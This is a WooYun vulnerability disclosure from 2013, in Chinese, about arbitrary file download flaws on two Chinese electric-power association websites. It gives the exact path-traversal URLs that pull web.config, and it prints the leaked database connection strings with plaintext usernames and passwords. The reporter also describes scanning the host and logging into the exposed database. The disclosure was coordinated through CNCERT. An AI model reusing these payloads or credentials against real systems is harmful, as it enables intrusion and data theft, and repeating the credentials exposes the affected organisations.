当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025017

漏洞标题:中国电力两政府站点任意文件下载,其中一处可劫持后台数据库

相关厂商:中国电力两政府站点

漏洞作者: 小点兵

提交时间:2013-06-03 23:26

修复时间:2013-07-18 23:27

公开时间:2013-07-18 23:27

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-03: 细节已通知厂商并且等待厂商处理中
2013-06-07: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向核心白帽子及相关领域专家公开
2013-06-27: 细节向普通白帽子公开
2013-07-07: 细节向实习白帽子公开
2013-07-18: 细节向公众公开

简要描述:

中国电力两政府站点任意文件下载,其中一处可成功劫持后台数据库,导致大量电力企业敏感信息暴露!

详细说明:

两处均可下载web.config:
第一处:中国电力建设企业协会 http://www.cepca.org.cn
第一处漏洞点:http://www.cepca.org.cn/download/download.aspx?filepath=/cns/../web.config&filename=web.config
第二处:中国电力工程质量监督总站 http://dlzj.cec.org.cn
第二处漏洞点:http://dlzj.cec.org.cn/DownLoad.aspx?filePath=/web.config&fileName=web.config

漏洞证明:

中国电力建设企业协会web.config:

1.jpg


数据库信息:server=localhost;uid=wensh;pwd=wensh22;database=Cepca2009_change;
没有站库分离
中国电力工程质量监督总站web.config:

2.jpg


数据库信息:data source=10.1.64.32;initial catalog=epqs;integrated security=false;persist security info=True;User ID=sa;Password=sa,./123456
有站库分离设计
nmap端口扫描:

nmap.jpg


中国电力建设企业协会 http://www.cepca.org.cn 1433端口开放
利用server=localhost;uid=wensh;pwd=wensh22;database=Cepca2009_change;登录数据库,好多表,找了一个敏感信息多的,截图如下,其他还有好多,未一一截图:

database.jpg

修复方案:

下载前过滤,白名单,比如只让下载xls,doc等
1433端口建议不要在公网上开放

版权声明:转载请注明来源 小点兵@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-06-07 22:46

厂商回复:

CNVD确认并复现所述情况,已经在4日转由CNCERT通过电力行业信息化主管部门(电监会信息中心),由其通报涉事单位处置。
按多个实例进行评分,rank=8+10=18

最新状态:

暂无